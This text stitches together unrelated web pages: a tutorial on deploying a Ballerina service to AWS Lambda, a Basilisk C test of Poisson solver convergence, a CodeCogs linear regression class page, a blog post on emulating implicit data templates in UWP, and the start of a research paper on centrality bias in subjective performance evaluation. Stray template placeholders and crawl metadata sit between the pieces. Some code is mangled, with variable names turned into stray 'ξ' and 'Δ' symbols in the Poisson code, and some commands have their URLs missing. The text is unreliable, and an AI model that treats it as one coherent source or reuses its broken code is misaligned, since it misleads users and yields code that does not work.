Running a Ballerina Service as a Serverless Function in AWS Lambda
Ballerina is a programming language optimized for integration and it is being developed by WSO2. With Ballerina, it’s very easy to write integration services. For example, see following Hello World Service in Ballerina (
hello-world-service.bal).
import ballerina.net.http; service<http> helloWorld { resource sayHello (http:Request req, http:Response res) { res.setStringPayload("Hello, World!"); _ = res.send(); } }
When you compile (
ballerina build hello-world-service.bal) and run this program (
ballerina run hello-world-service.balx), the Ballerina will run an HTTP server as it recognizes that you want to expose a service directly over the network via HTTP protocol. For example, you can now directly send a GET request to the Ballerina service resource named “
sayHello”.
Example:
$ curl Hello, World!
There is much more you can do with Ballerina and you can go through the Ballerina By Example page to learn about the language features.
In this story, I’m explaining how you can run your Ballerina Service as a serverless function in AWS Lambda. Before that, let’s see what is meant by “Serverless”.
What is Serverless and AWS Lambda?
Serverless is simply about not having to worry about servers when you write an application and you only focus on the application logic. Basically you don’t need to manage your own server hosts and the server processes. This is just a simple explanation about “serverless.” I recommend you read more about “Serverless Architectures.” O’Reilly also has a great free book entitled What is Serverless?
There are many benefits in a serverless world. Most importantly, it reduces costs and there is a shorter lead time. This is very important for innovation as you can vastly reduce the time to implement your application.
AWS Lambda is a compute service provided by Amazon Web Services. With AWS Lambda, you can deploy your code and run it as a serverless function. The AWS Lambda will manage the server resources and the server process for you. You only need to concentrate on your application logic.
Following are the languages supported by AWS Lambda currently.
- Java
- Node.js
- C#
- Python
Currently, the Ballerina runs on BVM (Ballerina Virtual Machine), which is a Java based VM. Therefore, we can use the Java Language Runtime provided by AWS Lambda.
How Does AWS Lambda Work?
In AWS Lambda, we deploy the code to run based on events. For example, when there is an HTTP request, the AWS Lambda can trigger your code.
In AWS Lambda, regardless of the language, we need to write a handler method, which is first called by AWS Lambda when it begins executing the code.
How to Invoke Ballerina Service Resource?
Since Ballerina is running on the JVM, we need to write a handler in Java.
Within this handler method, we need to process the request and invoke a Ballerina service resource directly.
Running the Ballerina server within the handler is not an option as the serverless function has to be stateless and we cannot start a server for each HTTP request event. Fortunately, there is a way to directly execute a Ballerina service resource using Java APIs. These Java APIs are not official APIs and those may be removed in future.
This is similar to the approach used by Lambada framework, which allows you to implement JAX-RS APIs and deploy in a serverless fashion. With Lambada, we can migrate existing JAX-RS applications to AWS Lambda. Lambada framework basically invokes the JAX-RS method directly using the AWS Lambda handler method.
To implement the Handler, I used the Java interface
com.amazonaws.services.lambda.runtime.RequestHandler and used POJO classes for request and response.
In the constructor, the Ballerina service is compiled using an API and the compiled result is kept in the memory. Currently there is no API to directly run a compiled Ballerina service (with .balx extension).
The handler method locates the service resource in the compiled Ballerina service and executes it programmatically.
Since we are planning to use an HTTP request to trigger the handler method, we can use the “Amazon API Gateway.” When using the API Gateway, the input and output formats are predefined. Therefore, we just have to develop the request and response classes mapping to the input and output formats.
I created a Maven project and implemented a request handler as mentioned above. The source code is available at:
How to Run Your Own Ballerina Service in AWS Lambda
With the “ballerina-lambda”, now you can run your own Ballerina service without having worrying about any AWS Lambda specific code.
It’s important to note that “ballerina-lambda” project is only supporting to invoke a specific service resource method in your Ballerina method.
Let’s take a sample Ballerina Service:
package helloService; import ballerina.net.http; @http:configuration {basePath:"/hello"} service<http> helloService { @http:resourceConfig { methods:["POST"], path:"/" } resource sayHello(http:Request req, http:Response res) { json jsonRequest = req.getJsonPayload(); string firstName; string lastName; firstName, _ = (string)jsonRequest.Name.FirstName; lastName, _ = (string)jsonRequest.Name.LastName; json payload = {"Response":""}; payload.Response = "Hello, " + firstName + " " + lastName; res.setJsonPayload(payload); _ = res.send(); } }
This service accepts a JSON payload as follows.
{ "Name":{ "FirstName":"Isuru", "LastName":"Perera" } }
Now, to deploy this Ballerina Service to the AWS Lambda, we need to create a deployment package.
Following are the steps to create the deployment package.
- Clone the ballerina-lambda repository.
git clone --depth=1 cd ballerina-lambda/
- Save ballerina service in
ballerina-servicesdirectory. Currently, the ballerina-lambda expects a ballerina package name, which includes the Ballerina service. Therefore, you need to make sure that the ballerina service is in a package. There is already a sample
helloWorldServiceinside the
ballerina-servicesdirectory.
cd ballerina-services/mkdir helloService cd helloService vi helloService.bal #Save above helloService in this file. cd ../../
- Now build the maven project.
mvn clean package
- There should be a zip file named
ballerina-lambda-1.0.0-SNAPSHOT.zipinside
targetdirectory.
- Now login to AWS Console and visit “Lambda” service.
- Click on “Create function.” Let’s author a Lambda function from scratch.
- Use
BallerinaHelloServicefor the name and select
Java 8for the runtime.
- You also need to select a role for the function. You can create a new role named “
BallerinaHelloServiceRole” and select “
Basic Edge Lambda permissions” from Policy templates. You may also select an existing role if you already have one.
- Click on “Create function.” After that you need to configure the Lambda function.
- In (1), you need to upload the
ballerina-lambda-1.0.0-SNAPSHOT.zipfile.
- Then you need to specify the handler method in (2). The handler method for ballerina-lambda project is as follows.
com.github.chrishantha.lambda.ballerina.BallerinaRequestHandler::handleRequest
- Add a trigger (3) using “API Gateway”.
- When configuring, click on “Enter value” for API name (1) and specify “BallerinaHelloService”
- Deployment stage (2) is “prod”
- For “Security” (3), select “Open” and “Add” the trigger.
- Click on “BallerinaHelloService” again to configure “Environment variables” and add following environment keys and values.
BAL_PACKAGE=helloService BAL_SERVICE_PATH=/hello/ BAL_SERVICE_METHOD=POST
- Select at least 256MB for Memory in “Basic settings”. Otherwise, the Ballerina service may not work. The CPU power is proportional to the amount of memory. See “Q: How are compute resources assigned to an AWS Lambda function?” in AWS Lambda FAQ.
- Click “Save” to save the “BallerinaHelloService” function.
- Now you can click on “API Gateway” configuration to see the “Invoke URL” for the Lambda function.
- You can send an HTTP request to the “Invoke URL” and test the Ballerina Service running as a Lambda function. For example:
curl -d '{"Name": {"FirstName": "Isuru", "LastName":"Perera"}}' {"Response":"Hello, Isuru Perera"}
What Happens When We Trigger the Lambda Function?
Since the Ballerina Hello Service Lambda function is working as a serverless function, the “function instance” will be created only when we send an HTTP request. For subsequent requests, the “function instance” may be reused and we don’t know how long will the “function instance” be alive.
See following sequence diagrams to understand how the first request and subsequent requests work.
Above sequence diagrams are important to understand, especially when you are concerned about response time latencies.
The ballerina-lambda function code internally measures the times at different points and send those data via response headers. Following are the response headers:
- VM Startup Time (ms) — This is the startup time of the JVM. This is only valid for the first request.
- Handler Init Time (ms) — This is the time taken to initialize the request handler. This is basically the time taken for the request handler constructor, which includes the Ballerina service compilation. This is only valid for the first request.
- Request Processing Time (ms) — This is the processing time of the request handling method.
- Lambda Remaining Time (ms) — This is the remaining time of the Lambda function (as calculated by AWS Lambda). This is taken from AWS Context object. This is the remaining time from Lambda Timeout, which is configured in “Basic settings.” So, this roughly equals to “Lambda Timeout (ms) - Request Processing Time (ms)”
- Lambda Up Time (ms) — This is the JVM UP time at the end of request processing.
- Amazon Request ID — This is the request ID from Amazon.
- Function Name — This is the name of the AWS Lambda Function
- Function Version — This is the version of the AWS Lambda Function
The first request time includes “VM Startup Time” + “Handler Init Time” + “Request Processing Time” + Network Latency.
All subsequent requests only include “Request Processing Time” + Network Latency.
However, for all requests, AWS Lambda is charging only for “Request Processing Time” + Network Latency.
Conclusion
In this story, I explained how you can run your Ballerina Service as a Serverless function in AWS Lambda.
You don’t have to do any AWS Lambda specific development and you can directly use the ballerina-lambda project to deploy your own Ballerina Service in AWS Lambda.
Amazon API Gateway can be used to trigger the Lambda function. The first request response time includes the time to start the function instance and the time to initialize the handler in addition to the request processing time and network latency.
TrueSight Cloud Cost Control provides visibility and control over multi-cloud costs including AWS, Azure, Google Cloud, and others.
Published at DZone with permission of Isuru Perera . See the original article here.
Opinions expressed by DZone contributors are their own.
{{ parent.title || parent.header.title}}
{{ parent.tldr }}
{{ parent.linkDescription }}{{ parent.urlSource.name }}
|
https://dzone.com/articles/ballerina-services-in-serverless-world
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
sandbox/Antoonvh/testpoisson.c
Convergence of the Poisson solver in 1D
On this page we try to find some of the convergence properties of the Basilisk poisson solver. The used solver is of the ‘multi-grid’ type and untilizes an iterative scheme to arrive at an converged solution. By default the solver iterates untill the maximum residual is below some set tolerance. On this page we solve a Poisson problem on 11 different grids with various levels of refinement and let the solver iterate (i.e. Cycle) ten times. We will check the convergence properties with respect to the cycles applied and the resolution. The goal is to check if we obtain sensible results so we can extend our analysis to grids generated according to an adaptive algorithm.
The chosen Problem
The Poisson problem we will be solving for reads,
According to Wolfram|Alpha the corresponding solution is,
with constants and determined by the boundary conditions.
The script
The Poisson solver is included and we opt for a one dimensional tree grid. The tree functionality will be usefull later.
#include "grid/bitree.h" #include "poisson.h"
The analyical solution can be evaluated to check the numerical solution. Furthermore, we initialize some usefull stuff.
#define sol(x,c1,c2) ((c1*x)+c2+(pow(M_PI,0.5)*(x)*erf(x)/2)+(exp(-(x*x))/2)) double c1,c2; scalar b[],a[]; mgstats mg; FILE * fp1; FILE * fp2; char name[100];
Since our solution represents volume averaged values we need to translate the analytical solution to a locally averaged one. Unfortunately, Wolfram Alpha was unable to provide me with the the integal form of the solution. Therefore a numerical integrator of the analytical solution is defined
double numintsol(double tol,double xi, double D,double c1,double c2){ //A Riemann integrator double into=5; double intn=1; double integral; double j=10; while ((fabs(into-intn)/fabs(intn))>tol){ // Perform the integration untill the integral has converged into=intn; intn=0.; integral=0; for (int m=0;m<j;m++){ // Summate the analytical solution j times double xp=(ξ-(D/2)+(D/(j*2))+(((double)m)*D/j)); //At equally spaced locations in the grid box integral+=sol(xp,c1,c2); } intn=integral/j; j=j*2; // Increase j if the integral has not converged upto the set standards } return intn; }
Similarly, the source term should be defined consistently.
double f(double xi,double Delta){ return (pow(M_PI,0.5)*(erf(((ξ)+(Δ/2)))-erf(((ξ)-(Δ/2)))))/(2*Δ); }
The rest of the script occurs in the function. The spatial extend of the grid is defined, suitable boundary conditions are chosen and the corresponding values for and are set.
int main(){ L0=10; X0=-L0/2; a[right]=dirichlet(0.); a[left]=neumann(0.); //Default Basilisk c1=pow(M_PI,0.5)/2; c2 =-sol(5,c1,0); fp2=fopen("gridcycles.dat","w");
A loop is used to iterate over 11 different resolutions, varying from to grid cells. Each time the solution and source term are initialized.
for (int j=0;j<11;j++){ init_grid(1<<(j+3)); sprintf(name,"MGcycles%d.dat",N); fp1=fopen(name,"w"); foreach(){ a[]=0.; // This choice is the problem of the poisson solver b[]=f(x,Δ); } double err; TOLERANCE=10; // Large Tolerance to prevent unwanted iterations fprintf(ferr,"Grid N=%d\n",N); boundary({a,b});
On each grid we let the Poisson solver iterate 10 times. After every iteration we write down the statistics of the solver and the error in the obtained solution.
for (int i=0;i<10;i++){ mg = poisson(a,b); //Solve the system err=0; double err2=0; foreach(){ err+=fabs(a[]-numintsol(10e-4*pow(Δ,3.),x,Δ,c1,c2))*Δ; //We evaluate the analytical solution with 3-rd order accuracy err2+=fabs(a[]-sol(x,c1,c2))*Δ; //We do not use this } fprintf(fp1,"%d\t%d\t%g\t%g\t%g\t%d\t%g\t%g\n",i,mg.i,mg.resb,mg.resa,mg.sum,mg.nrelax,err,err2); } fclose(fp1); fprintf(fp2,"%d\t%g\t%g\n",j,L0/((double)N),err); fflush(fp2); } fclose(fp2); }
Results
First we check how the maximum residual decreases with every iteration for three grids with different resolutions.
The convergence regions seems to start from and end at a iteration value that is resolution dependent. For the higher resolutions the residual seems to stop converging earlier and at a with a higher residual than the coarse grid runs.
Next we check how the error in the solution,
Now we see that the smaller residuals of the coarse runs do not translate into smaller errors in the solution. Also we see that with the first few iterations the fine grid solutions are not more accurate. It seems that only the fine-grid runs benefit from the large number of iterations. However, even for the finest-grid run the solution converges before the 10-th iteration. from We can check this converged solution error in a bit more detail.
So we can conclude that the Poisson solver is second-order accurate (i.e for the converged solution). Notice that this convergence takes more iterations for the higher resolution runs.
For some elucidation, here is an additional plot.
|
http://basilisk.fr/sandbox/Antoonvh/testpoisson.c
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
Maths › Approximation › Regression ›
Linear
Calculates the linear regression parameters and evaluates the regression line at arbitrary abscissasController: CodeCogs
Interface
C++
HTML
Class LinearLinear regression is a method to best fit a linear equation (straight line) of the form
Example 1
- The following example displays the slope, Y intercept and regression coefficient for a certain set of 7 points.
#include <codecogs/maths/approximation/regression/linear.h> #include <iostream> #include <iomanip> using namespace std; int main() { double x[7] = { 1.5, 2.4, 3.2, 4.8, 5.0, 7.0, 8.43 }; double y[7] = { 3.5, 5.3, 7.7, 6.2, 11.0, 9.5, 10.27 }; Maths::Regression::Linear A(7, x, y); cout << " Slope = " << A.getSlope() << endl; cout << "Intercept = " << A.getIntercept() << endl << endl; cout << "Regression coefficient = " << A.getCoefficient() << endl; cout << endl << "Regression line values" << endl << endl; for (double i = 0.0; i <= 3; i += 0.6) { cout << "x = " << setw(3) << i << " y = " << A.getValue(i); cout << endl; } return 0; }Output:
Slope = 0.904273 Intercept = 3.46212 Regression coefficient = 0.808257 Regression line values x = 0 y = 3.46212 x = 0.6 y = 4.00469 x = 1.2 y = 4.54725 x = 1.8 y = 5.08981 x = 2.4 y = 5.63238 x = 3 y = 6.17494
Authors
- Lucian Bentea (August 2005)
Source Code
Source code is available when you agree to a GP Licence or buy a Commercial Licence.
Not a member, then Register with CodeCogs. Already a Member, then Login.
Members of Linear
LinearInitializes the class by calculating the slope, intercept and regression coefficient based on the given constructor arguments.
Note
- The slope should not be infinite.
GetValue
GetCoefficientThe regression coefficient indicated how well linear regression fits to the original data. It is an expression of error in the fitting and is defined as:
and
, then r is considered to be equal to 1.
Linear Once
This function implements the Linear class for one off calculations, thereby avoid the need to instantiate the Linear class yourself.
Example 2
- The following graph fits a straight line to.
|
http://www.codecogs.com/library/maths/approximation/regression/linear.php
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
.
Let’s consider the following sample code where three different types are defined –
Apple,
Banana and
Pear. Each of these classes implement a common interface
IFruit and the view model exposes a collection of fruits that a
ListBox in the view binds to. The details of the currently selected fruit are displayed in a
ContentControl.
public interface IFruit { string Name { get; } } public class Apple : IFruit { public string Name => "Apple"; } public class Banana : IFruit { public string Name => "Banana"; } public class Pear : IFruit { public string Name => "Pear"; } public class ViewModel : INotifyPropertyChanged { public List<IFruit> Fruits { get; } = new List<IFruit>() { new Apple(), new Banana(), new Pear() }; private IFruit _selectedFruit; public IFruit SelectedFruit { get { return _selectedFruit; } set { _selectedFruit = value; NotifyPropertyChanged(); } } public event PropertyChangedEventHandler PropertyChanged; private void NotifyPropertyChanged([CallerMemberName] String propertyName = "") => PropertyChanged?.Invoke(this, new PropertyChangedEventArgs(propertyName)); }
<Grid> <Grid.ColumnDefinitions> <ColumnDefinition Width="Auto"/> <ColumnDefinition /> </Grid.ColumnDefinitions> <ListBox ItemsSource="{Binding Fruits}" SelectedItem="{Binding SelectedFruit}" DisplayMemberPath="Name" /> <ContentControl Content="{Binding SelectedFruit}" Grid. </Grid>
In
App.xaml there is a merged resource dictionary that contains a specific
DataTemplate associated with each type of fruit that defines how the fruit is presented to the user on the screen.
<Application x: <Application.Resources> <ResourceDictionary> <ResourceDictionary.MergedDictionaries> <ResourceDictionary Source="DataTemplates.xaml" /> </ResourceDictionary.MergedDictionaries> </ResourceDictionary> </Application.Resources> </Application>
This kind of master/detail experience is a pretty common scenario to implement in a UI application. So how to solve this in a UWP app?
As mentioned before you must set the
x:Key attribute of a
DataTemplate in a UWP app to a
string and this basically means that the
DataTemplate isn’t implicit any more. The closest you get to an implicit
DataTemplate in UWP is to set the
x:Key attribute to a value that can be used to uniquely identify the type to which you want to apply the template. Like for example the name of the type:
>
You could then write a converter class that looks up the data template based on the type of the data object:
public class ImplicitDataTemplateConverter : IValueConverter { public object Convert(object value, Type targetType, object parameter, string language) { if (value == null || App.Current == null) return null; object dataTemplate; if (App.Current.Resources.TryGetValue(value.GetType().Name, out dataTemplate)) return dataTemplate; return null; } public object ConvertBack(object value, Type targetType, object parameter, string language) { throw new NotSupportedException(); } }
The last thing you need to do is then to bind the
ContentTemplate property of the
ContentControl to the
SelectedFruit property of the view model and use the converter to select the appropriate data template:
<Page x: <Page.DataContext> <local:ViewModel /> </Page.DataContext> <Page.Resources> <local:ImplicitDataTemplateConverter x: </Page.Resources> <Grid Background="{ThemeResource ApplicationPageBackgroundThemeBrush}"> <Grid.ColumnDefinitions> <ColumnDefinition Width="Auto"/> <ColumnDefinition /> </Grid.ColumnDefinitions> <ListBox ItemsSource="{Binding Fruits}" SelectedItem="{Binding SelectedFruit, Mode=TwoWay}" DisplayMemberPath="Name" /> <ContentControl Content="{Binding SelectedFruit}" ContentTemplate="{Binding SelectedFruit, Converter={StaticResource ImplicitDataTemplateConverter}}" Grid. </Grid> </Page>
Compiled bindings support (x:Bind)
So far so food. Using this workaround, the template is being applied as expected. But what about
{x:Bind}? One of the nicest XAML features of the UWP is the support for compiled bindings. Unlike
{Binding}, the
{x:Bind} markup extension evaluates the binding expressions at compile-time which not only improves the runtime performance of the app but also makes it possible to detect binding errors when you build it.
To be able to use
{x:Bind} in a
DataTemplate you must set the
x:DataType attribute to the type to which the template is supposed to be applied. If you however try to do this in the
DataTemplates.xaml resource dictionary and build the application, you will get a compilation error:
<DataTemplate x: <TextBlock Text="I am an apple!" Foreground="Red" /> </DataTemplate>
{x:Bind} generates code at compile-time and for this to work the XAML file must be associated with a class. This is an easy thing to fix though. You could just add a
DataTemplates.xaml.cs partial code-behind class to the folder where the
DataTemplates.xaml resource dictionary is located. In the constructor of the partial class you should call the
InitializeComponent() method to initialize the generated code:
public partial class DataTemplates : ResourceDictionary { public DataTemplates() { InitializeComponent(); } }
You then set the
x:Class attribute of the
ResourceDictionary element in the XAML file to the partial class name and then the application should build just fine.
>
In order to be able to use
{x:Bind} in the MainPage XAML you should then modify the code-behind class a bit. The view model needs to be exposed in a strongly typed fashion for the compile-time safety to work. The source of a compiled binding is always the class itself, i.e. the
Page class in this case, rather than the
DataContext of the element. In this case, we could add a
ViewModel property to the
DataContext property is set:
public sealed partial class MainPage : Page { public MainPage() { this.InitializeComponent(); DataContextChanged += (s, e) => ViewModel = DataContext as ViewModel; } public static readonly DependencyProperty ViewModelProperty = DependencyProperty.Register(nameof(MainPage), typeof(ViewModel), typeof(ImplicitDataTemplateConverter), new PropertyMetadata(null)); public ViewModel ViewModel { get { return (ViewModel)GetValue(ViewModelProperty); } set { SetValue(ViewModelProperty, value); } } }
And bind to the properties of this using
{x:Bind} in the XAML markup. Remember that the default mode of
{x:Bind} is
OneTime so you need to explicitly set the
Mode property to
OneWay for the
Content and the
ContentTemplate target properties of the
ContentPresenter to get updated when the source properties of the view model are set:
<ContentControl Content="{x:Bind ViewModel.SelectedFruit, Mode=OneWay}" ContentTemplate="{x:Bind ViewModel.SelectedFruit, Mode=OneWay, Converter={StaticResource ImplicitDataTemplateConverter}}" Grid.
Finally, it should be mentioned that this is indeed a workaround to be able to use something similar to implicit data templates in UWP. It is not perfect though. You may for example have several different types with the same type name in different namespaces or assemblies and then you need to come up with another
x:Key naming strategy for the data templates than simply using the short type name. Also there is no good way of determining whether the
x:DataType attribute of data template that the converter looks up actually matches the type of the data object that is passed to the converter at runtime.
So there are certainly pitfalls but the workaround presented in this post should hopefully be applicable and work just fine as-is or with some slight application-specific modifications in the vast majority of scenarios.
This is very clear and very clever. I have just attempted my first UWP app and am discouraged by the lack of implicit data templates. Not being able to use them makes implementing MVVM more difficult in my opinion.
|
https://blog.magnusmontin.net/2017/03/25/uwp-implicit-data-template/
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
The psychological effects of centrality bias: an experimental analysis
- 357 Downloads
Abstract
This paper examines the psychological mechanisms that are activated by centrality bias in the context of subjective performance evaluation. Centrality bias refers to compressed evaluations of subordinates, implying that the variance in the performance of the evaluated employees is higher than the variance in the rewards determined by the superior. Based on insights from the social psychology literature, we argue that centrality bias may trigger different psychological mechanisms which affect the subordinates’ willingness to exert work effort. We propose that these effects differ depending on whether employees are above-average or below-average performers. In line with our predictions, we detect a considerable asymmetry in the effects of centrality bias. In particular, we find that the relationship between centrality bias and the willingness to exert work effort is negatively mediated by controlled motivation and procedural fairness perceptions for above-average performers. For below-average performers, we find that centrality bias is positively related to procedural fairness perceptions which are, however, unrelated to the willingness to exert work effort. In addition, we shed light on the role of peer information and find that its disclosure has not a significant impact on the psychological mechanisms at work.
KeywordsAutonomous motivation Centrality bias Controlled motivation Procedural fairness Subjective performance evaluation
JEL ClassificationM41 M52
1 Introduction
The objective of this paper is to advance our knowledge on the behavioural implications of centrality bias. For this reason, we illuminate the psychological mechanisms that are activated by compressed subjective performance evaluations. Subjectivity in the context of performance evaluation has gained considerable momentum in recent years due to the shortcomings of objective performance measures (Ahn et al. 2010; Bol 2011; Cheng and Coyte 2014; Voußem et al. 2016). In particular, objective measures may be insensitive to employees’ actions, incongruent with organizational objectives, noisy concerning uncontrollable factors or incomplete with regard to an employee’s performance (Bol 2008; Rajan and Reichelstein 2006; Woods 2012). Subjective adjustments to objective performance measures made by the superior during the determination of monetary rewards may mitigate these shortcomings (Dai et al. 2018; Höppe and Moers 2011).1 Correspondingly, empirical evidence suggests that monetary rewards which are based on subjective assessments have a positive impact on pay satisfaction, productivity and profitability (Gibbs et al. 2004).
However, a potential drawback of subjective performance evaluation is its inherent discretion (Ittner et al. 2003; Moers 2005; Van der Stede et al. 2006). Prior research indicates that subjective performance evaluation often implies inaccuracies due to systematic measurement errors (Ahn et al. 2010; Bol 2011), suggesting that performance assessments by superiors are biased. In this context, leniency bias and centrality bias are two frequently observed patterns (Bol 2011; Frederiksen et al. 2017; Moers 2005; Prendergast 1999).2 Leniency bias is the tendency to inflate performance rewards, whereas centrality bias leads to compressed ratings. As the result of the latter, the variance in the ratings by the superior is lower than the variance in the performance of the evaluated employees (Bol 2008; Golman and Bhatia 2012). In other words, performers below (above) the average receive a higher (lower) reward than they are actually entitled to according to their performance (Bol et al. 2016). From a superior’s perspective, it may be situationally rational to provide biased rewards. For instance, leniency bias may occur because the superior cares about the well-being of his subordinates or intends to avoid costs arising out of negative evaluations (Frederiksen et al. 2017; Kampkötter and Sliwka 2016). A lower differentiation of evaluations, as implied by centrality bias, may result from a superior’s inequality aversion or imprecise signals regarding the subordinates’ individual performance. It may also alleviate within-team competition and promote cooperation (Kampkötter and Sliwka 2016, 2017).
Irrespective of these arguments, prior research stresses the adverse effects of centrality bias as predicted by economic theory (Baker et al. 1988; Prendergast 1999). Empirical evidence on the effects of centrality bias is scarce, potentially due to the lacking availability of corresponding company data sets and difficulties in getting access to them. However, the few exceptions that investigate the effects of centrality bias empirically tend to suggest that it is negatively associated with performance improvements (Ahn et al. 2010; Berger et al. 2013; Bol 2011; Engellandt and Riphahn 2011). This stream of research argues—in line with economic theory—that performance evaluations which are subject to centrality bias neither reward performance improvements nor sanction performance deteriorations adequately. As a consequence, individuals are expected to neglect performance enhancing efforts (Ahn et al. 2010).
This perspective, however, does not account for the full complexity of human behaviour which is not one-dimensionally motivated by external mechanisms. In this paper, we therefore argue—based on insights from the social psychology literature—that centrality bias may activate different psychological mechanisms with opposing behavioural implications. Correspondingly, we explore the different psychological mechanisms that may be triggered by centrality bias and shed light on their net effect. More precisely, we analyse whether the relationship between centrality bias and the willingness to exert work effort is mediated by controlled motivation and autonomous motivation—two types of motivation distinguished by self-determination theory—and by procedural fairness perceptions. Given that previous research has focused on the relationship between centrality bias and subsequent performance, we intend to open the intermediate “black box” by shedding light on the different psychological mechanisms that may explain prior empirical findings. An implicit idea inherent in this study is that the behavioural implications of centrality bias might be less uncontested than suggested by the prior literature. Indeed, this idea is reflected by Kampkötter and Sliwka (2017). Their findings suggest that differentiation (which implies the absence of a centrality bias) in performance appraisals is situationally related to lower subsequent performance. This finding challenges the prevailing notion that centrality bias has adverse effects per se.
In addition to opening the “black box” of psychological mechanisms, our paper emphasizes two particularities that may affect the behavioural implications of centrality bias: With the exception of Bol (2011), prior research usually does not take into consideration that the effect of centrality bias is likely to differ for above-average performers as compared to below-average performers. Therefore, we take this differentiation into account and investigate the psychological mechanisms activated by centrality bias separately for above-average and below-average performers. Moreover, prior research mostly measures centrality bias based on individual sequences of performance appraisals and assumes that employees adapt their efforts as they anticipate future evaluations based on past rewards (Kampkötter and Sliwka 2017). In these studies, employees are usually not aware of whether the rewards of their peers are to the same degree subject to bias. In fact, the tendency to undervalue above-average performers and to overvalue below-average performers implies an unequal treatment of employees, suggesting that employees are to different degrees affected by centrality bias. According to insights from the social psychology literature, awareness or unawareness of the varying degrees to which employees are affected by centrality bias may have an impact on the psychological mechanisms and their behavioural implications. Against this background, we study how the availability of peer information, which unveils that above-average performers (below-average performers) are systematically undervalued (overvalued), is related to the psychological mechanisms activated by centrality bias.
We investigate our research questions and hypotheses in a vignette experiment with 425 students enrolled in a German university. Vignette experiments present participants a constructed description of a situation and capture their intentions and attitudes (Aguinis and Bradley 2014). In the present study, the participants faced a hypothetical work situation and were asked to complete a questionnaire which informs us about their willingness to exert work effort, their controlled and autonomous motivation and fairness perceptions. In line with our theoretical expectations, we detect a considerable asymmetry in the effects of centrality bias. More precisely, we find that centrality bias is significantly and negatively related to the willingness to exert work effort for above-average performers, but unrelated for below-average performers. With regard to the psychological mechanisms, we find that the relationship between centrality bias and the willingness to exert work effort is mediated by controlled motivation and procedural fairness perceptions for above-average performers. We detect a direct effect of procedural fairness perceptions on the willingness to exert work effort and an indirect one via autonomous motivation. For below-average performers, we find that centrality bias is positively related to procedural fairness perceptions which are, however, unrelated to the willingness to exert work effort. Interestingly and opposing to our predictions, we find that the disclosure of peer information has not a significant impact on the psychological mechanisms at work. Taken together, our study provides insights into the behavioural implications of centrality bias that go beyond the suggestions by economic theory. In this way, we complement the prior literature on centrality bias which mostly assumes negative effects on work effort and therefore focuses on its determinants (Bol 2011; Bol et al. 2016; Breuer et al. 2013; Chen 2014; Moers 2005; Woods 2012).
This paper is structured as follows. In Sect. 2, we develop our research questions and hypotheses based on insights from the social psychology literature. In Sect. 3, we describe the experimental procedure. We present our findings in Sect. 4 and discuss them in Sect. 5.
2 Hypotheses and research questions
2.1 Background
We explore the psychological mechanisms activated by centrality bias based on a hypothetical work situation, in which a superior determines a bonus for five subordinates to compensate their work effort.3 While an objective measure of work effort is available for bonus assessment, the superior may discretionarily adjust the financial rewards. If the superior makes use of his discretion, a centrality bias emerges in our setting. We are interested in how these subjective adjustments affect the subordinates’ willingness to exert work effort in the future period. In this context, the following lines of reasoning rely on two main ideas: First, we assume that the behavioural implications of centrality bias may depend on whether a subordinate has performed below or above the average. Second, we expect that the behavioural response also depends on whether a subordinate has not only information about his own reward, but also about the rewards of his peers (“peer information”). Based on insights from the social psychology literature, we thus discuss in the following the mediating role of different psychological mechanisms and the moderating role of peer information.
2.2 The mediating role of controlled motivation
Unlike traditional economic theory, which assumes that individuals are solely extrinsically motivated, self-determination theory provides a typology of different motivation types. A core idea of self-determination theory is the distinction between controlled and autonomous motivation (Gagné and Deci 2005). Both types of motivation are expected to increase the willingness to exert work effort (Kunz 2015). Controlled motivation is, in line with the assumptions of economic theory (Bonner and Sprinkle 2002; Eisenhardt 1989), regulated by external mechanisms, such as monetary rewards (Kunz 2015; Zapata-Phelan 2009). Correspondingly, we assume that an individual’s controlled motivation is likely to be higher when performance-contingent monetary rewards are offered as compared to a situation in which no rewards are provided (Bonner and Sprinkle 2002; Kunz and Pfaff 2002). The motivational effect of monetary rewards is likely to be highest when there is a direct relationship between an individual’s effort and the evaluation outcome. Centrality bias, however, mitigates this relationship (Prendergast 1999). Due to deflated performance evaluations, above-average performers (below-average performers) receive a lower (higher) reward than they would receive based on their effort. Moreover, an increase in effort leads to a disproportionally low increase in monetary rewards (Berger et al. 2013; Bol 2011). Against this background, inducing more effort does not “pay off” adequately. If an individual is subject to centrality bias, we thus expect that the impact of monetary rewards on controlled motivation decreases, given that a marginal decline in effort is likely to imply a disproportionally low decline in rewards (Golman and Bhatia 2012). Therefore, we expect that above-average as well as below-average performers who are subject to centrality bias have less controlled motivation to exert work effort. Correspondingly, we formulate the following hypothesis (H):4
H1: Centrality bias is negatively related to controlled motivation.
2.3 The mediating role of autonomous motivation
According to self-determination theory, an individual’s actions are not entirely driven by external mechanisms such as monetary rewards. Instead, it suggests that individuals are also autonomously motivated to engage in a task because of enjoyment or identification with the value and meaning that an activity implies (Gagné et al. 2015).5 Self-determination theory states that autonomous motivation is influenced by the satisfaction of three basic psychological needs—autonomy, competence and relatedness (Deci and Ryan 2000; Van den Broeck et al. 2010). The need for autonomy reflects an individual’s need to feel self-determined and to have possibilities of choice (Deci and Ryan 2000; Gagné and Deci 2005). The need for competence refers to the experience of success in performing tasks and attaining intended outcomes (Deci et al. 2001). The need for relatedness captures the need to feel connected to others (Deci and Ryan 2000).
Self-determination theory argues that autonomous motivation can be influenced via contextual factors that address these psychological needs. According to Gagné and Forest (2008), compensation systems represent one of these contextual factors. In particular, the provision of rewards may derogate the feeling of autonomy as they put individuals under pressure to achieve a particular target and make them feel restricted in their decision-making about which actions need to be performed (Deci and Ryan 2000; Kunz and Linder 2012). At the same time, such rewards positively impact the feeling of competence as they imply feedback on an individual’s task performance and goal attainment (Deci et al. 2001; Gagné and Forest 2008).
We argue that centrality bias may influence the satisfaction of these needs and thus expect autonomous motivation to mediate the relationship between centrality bias and the willingness to exert work effort. Previous research suggests that positive feedback is able to enhance the feeling of competence (Deci and Ryan 2000). In presence of a centrality bias, below-average performers receive an inflated reward. The corresponding overvaluation of their work effort may be perceived as a recognition, signalling success in performing the evaluated task and thus contributing to the feeling of competence. In contrast, above-average performers receive a deflated reward. This “undervaluation” may be perceived as negative feedback, suggesting that a task is not successfully performed. Therefore, centrality bias is likely to decrease the feeling of competence for above-average performers.
